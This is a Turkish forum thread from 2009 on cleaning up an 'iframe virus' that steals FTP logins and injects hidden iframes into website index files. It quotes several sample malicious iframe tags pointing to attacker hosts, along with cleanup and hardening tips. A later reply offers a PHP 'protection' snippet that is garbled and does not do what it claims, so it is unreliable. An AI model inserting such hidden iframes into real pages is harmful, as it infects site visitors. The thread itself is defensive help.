Tarih: 2009-08-11, 16:17:09 Mesaj konusu: İframe Virüsü Temizleme... - Sabit Konu -
Son zamanlarda ortaya çıkan ve bilginiz dahilinde olmadan FTP programınızı kullanarak adres listesindeki sitelere zararlı kod ekleyen bir çeşit virüs büyük hızla yayılmaya devam etmektedir.
Bu virüs yüzünden ben intihar etmeyi bile düşündüm. 5 defa siteyi sil kur yaptım. Umarım kimsenin
başına gelmez bu durum gerçekten de emeklerin boşa gitmesi çok kötü oluyor neyse muhabbeti bırakaım da konuya geçelim..
Bu virüs bilgisayarınıza bulaştıkdan sonra o bilgisayarla hangi sitenin ftp'sini açarsanız açın girdiğiniz ftp bilgilerini kaydederek, sitelere girip index.php, index.html, index.htm, default.asp'in içlerine i f r a m e kodu atiyor atılan i f r a m e kodu şu şekildedir:
Örnek Bazı Virüs Kodları :
<i f r a m e src="http://110.a38q.cn/lx.htm" width="100" height="0" frameborder="0"></i f r a m e>
veya
<i f r a m e src='http://81.95.145.240/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 />FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></i f r a m e>
veya
<i f r a m e src='http:/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></i f r a m e>
veya
<i f r a m e src="http://*****.cn/in/" width=1 height=1 style="visibility: hidden"></i f r a m e>
Nasıl Bulaşır
Virüs bulaşmış bir web sitesine girdiğiniz zaman ve bilgisayarınızda güncellenmiş ve bu virüsü tanıyan bir antivirüs programı yüklü değilse bu virüs sizede bulaşır.
*YASAK KELİME** Önlem Paketi
1- Web sitenizi olduğu gibi bilgisayarınıza indirin.
2- Virüs bulaşmış sayfaları bulup içindeki virüs kodlarını silin. (Yukarıda virüs kodları verilmiştir.)
2- Web Sitenizin FTP Bilgilerini (Kullanıcı Adınızı veya Şifrenizi) değiştirin.
3- Bilgisayarınızı güncel bir antivirüs programları ile taratın. (Tavsiyemiz Kaspersky )
4- Eğer antivirüs programları bilgisayarınızda ilgili i f r a m e virüsünü bulamamışsa bilgisayarınıza format atınız.
5- Bilgisayarınızın virüsten temizlendiğine emin olduysanız web sitenizi tekrar FTP ile sunucuya gönderebilirsiniz.
i f r a m e Virüsünden Korunma
1- PHP Siteler için: Web sitenizdeki tüm index.php ,index.htm, index.html dosyalarının chmod değerini 444 yapınız.
2- ASP siteler için: Web sitenizdeki tüm index.asp, default.asp, index.htm, index.html dosyalarını salt okunur yapın veya FTP User kullanıcısının yazma iznini kaldırın.
3- Ayrıca: FTP ile Dosya gönderme işleminiz bittiği zaman FTP şifrenizi hemen değiştirin.
4- Bilgisayarınıza güncel bir antivirüs programı bulundarmaya özen gösterin. Tavsiyemiz Kaspersky'dır.
5- Ad-Aware gibi trojan temizleme programları ile bilgisayarınız 2-3 günde bir taratın.
benimkine bulaştı fakat ben siteyi silmedim şöyleki;
pc nize bulaştı ise ben format attım öyle temizledim başka temizleme yolu bulamadım. formattan sora iyi bir antivirüs kurun güncelleyin antivirüs kurmadan kesinlikle sitenize girmeyin
ftp programı kullanmadan ftp nize girin ve virüs bulaşmış dosyalarınızı orjinali ile degiştirin sadece index, header, footer, yani ana dizinde bulunan dosyalara bulaşıyor. bunları orjinali ile degiştirin...
ben bunları yaptım virüsten kurtuldum kurdugum antivirüs programı
mcafe scurity center :)
rus hackerların cıkardıgı i f r a m e virüsü son zamanlarda baya yayılmış durumda özellikle google da bu site bilgisayarınıza zarar verebilir uyarısı ile karsılasıyorsunuz ve google dan sitenize erişilemiyor..bu virüsün hackerlera sagladıgı avantajlarda cabası..bu virüsden kurtulmanız için sitenizin head kısmına yani üst kısmına asagıdaki kodları ekleyerek sitenize iframenin dosyalarınızın içinde calısmasını engelleyebilirsiniz
<?php
if (!eregi("i f r a m eçağırılansayfa.php", $PHP_SELF)) {
die ("Direk Erişim Yasak !");
}
?>
Bu forumda yeni başlıklar açamazsınız Bu forumdaki başlıklara cevap veremezsiniz Bu forumdaki mesajlarınızı değiştiremezsiniz Bu forumdaki mesajlarınızı silemezsiniz Bu forumdaki anketlerde oy kullanamazsınız
Arama
Rütbeliler
Profil
Giriş
